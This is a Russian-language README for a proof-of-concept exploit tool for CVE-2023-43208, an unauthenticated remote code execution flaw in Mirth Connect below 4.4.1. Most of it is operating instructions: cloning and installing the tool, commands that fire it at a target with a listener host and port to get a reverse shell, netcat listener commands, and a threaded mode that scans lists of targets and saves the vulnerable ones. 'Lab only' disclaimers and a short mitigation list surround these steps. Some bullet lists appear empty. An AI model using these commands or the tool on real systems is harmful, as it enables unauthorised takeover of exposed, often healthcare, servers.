
Эксплойт доказательства концепции для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1.
⚠️ ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И ЛАБОРАТОРНЫХ ЦЕЛЕЙ ⚠️
Доказательство концепции эксплойта для CVE-2023-43208, уязвимости удаленного выполнения кода в Mirth Connect до версии 4.4.1.
Этот инструмент строго предназначен для:
НЕ ИСПОЛЬЗУЙТЕ:
Вы несете ответственность за соблюдение всех применимых законов и нормативных актов. Неправильное использование этого инструмента может привести к уголовному преследованию.
Этот эксплойт нацелен на уязвимость десериализации XML в конечной точке /api/users Mirth Connect, позволяющую неаутентифицированное удаленное выполнение кода на уязвимых версиях (< 4.4.1).
Это КРИТИЧЕСКАЯ уязвимость, и ее следует ТЕСТИРОВАТЬ ТОЛЬКО в изолированных лабораторных средах на собственных системах.
requirements.txtgit clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT
pip install -r requirements.txt
python exploit.py
# Эксплуатация одной цели (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
# Сканирование нескольких целей из файла (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
# Неинтерактивный режим (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
-u, --url URL-адрес цели для эксплуатации (ТОЛЬКО ДЛЯ ЛАБОРАТОРИИ)
-lh, --lhost Прослушивающий хост (ваш IP)
-lp, --lport Прослушивающий порт
-f, --file Файл со списком URL-адресов целей для сканирования
-o, --output Выходной файл для сохранения результатов сканирования
-t, --threads Количество потоков для сканирования (по умолчанию: 50)
--no-interactive Запуск в неинтерактивном режиме
Настройте свою лабораторию:
Запустите свой слушатель:
ncat -lnvp 4444
# или
nc -lnvp 4444
Запустите эксплойт в своей лаборатории:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
Эксплойт использует гаджеты Commons Collections для достижения RCE через конечную точку /api/users.
Если вы используете Mirth Connect:
✅ Обновитесь до версии 4.4.1 или выше
✅ Ограничьте сетевой доступ к интерфейсам администратора
✅ Внедрите надлежащую аутентификацию
✅ Отслеживайте подозрительные XML-полезные нагрузки
╔══════════════════════════════════════════════════════════════╗
║ ЭТОТ ИНСТРУМЕНТ ТОЛЬКО ДЛЯ ЛАБОРАТОРНОГО ИСПОЛЬЗОВАНИЯ ║
║ Несанкционированное использование НЕЗАКОННО и НЕЭТИЧНО ║
║ Вы принимаете ВЕСЬ риск и ответственность ║
║ Автор не несет НИКАКОЙ ответственности за неправильное ║
║ использование ║
╚══════════════════════════════════════════════════════════════╝